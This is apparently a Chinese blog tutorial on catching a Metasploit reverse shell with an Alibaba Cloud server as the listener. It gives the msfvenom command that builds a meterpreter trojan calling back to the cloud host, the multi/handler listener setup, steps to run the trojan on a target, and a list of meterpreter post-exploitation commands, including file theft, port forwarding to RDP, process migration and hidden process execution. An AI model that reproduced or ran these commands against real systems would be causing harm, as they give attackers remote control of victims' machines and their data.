在阿里云主机反弹metosploit

前提

一般反弹shell,需要一个公网Ip的机器,这里我们选择阿里云主机,因为阿里云主机默认是只开放了固定端口,因此我们想要对某个端口监听的,首先需要开起阿里云的具体端口,这里我们选择7777作为监听端口,具体配置如下图所示。这里还应该注意的是阿里云主机有两个IP,一个是公网IP,另外一个是内网IP,具体用法下面会说到。

利用阿里云作为反弹主机,因为阿里云主机默认是将端口关闭的,因此首先需要允许对应端口开放,这里我选择的是7777,具体配置如下图所示。需要注意的是,阿里主机有两个IP,一个为公网IP,一个为内网IP,这两个IP后面会说到。

1602814914926

反弹shell步骤

步骤如下:

1)生成载荷/木马,注意这里用的是阿里云公网IP(生成各种载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=阿里云公网IP lport=7777 -f exe > load.exe

2) 阿里云主机开始监听

msfconsle #打开msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #注意这里的载荷要和生成木马对应的载荷相同
options #查看选项
set LHOST 阿里云内网IP #设置监听IP
set LPORT 7777  #设置监听端口
run/exploit#开始监听

3)目标主机执行载荷/木马

双击Exe,如果是linux下,生成的elf木马

chmod muma.elf#赋可执行权限
./muma.elf #执行木马

4)观察阿里云主机是否连接成功,如下图表示连接成功

1610958466075

5)连接成功后,meterpreter常用命令如下。

基本命令

background  # 让meterpreter处于后台模式  
sessions -i index   # 与会话进行交互,index表示第一个session  
quit  # 退出会话  
shell # 获得控制台权限  
irb # 开启ruby终端

文件系统命令

cat # 查看文件内容  
getwd # 查看当前工作目录  
upload  # 上传文件到目标机上  
download # 下载文件到本机上  
edit # 编辑文件  
search  # 搜索文件

网络命令

ipconfig / ifconfig # 查看网络接口信息  
portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # 端口转发,本机监听4444,把目标机3389转到本机4444 
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码
route # 获取路由表信息

系统命令

ps # 查看当前活跃进程 
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中 
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 
getpid # 获取当前进程的pid 
kill pid # 杀死进程 
getuid # 查看权限 
sysinfo # 查看目标机系统信息,如机器名,操作系统等 
shutdown # 关机

REF:

meterpreter相关教程包括后渗透攻击

Metasploit 生成各种攻击载荷

各种姿势反弹shell

文章目录
  1. 前提
  2. 反弹shell步骤
  3. REF: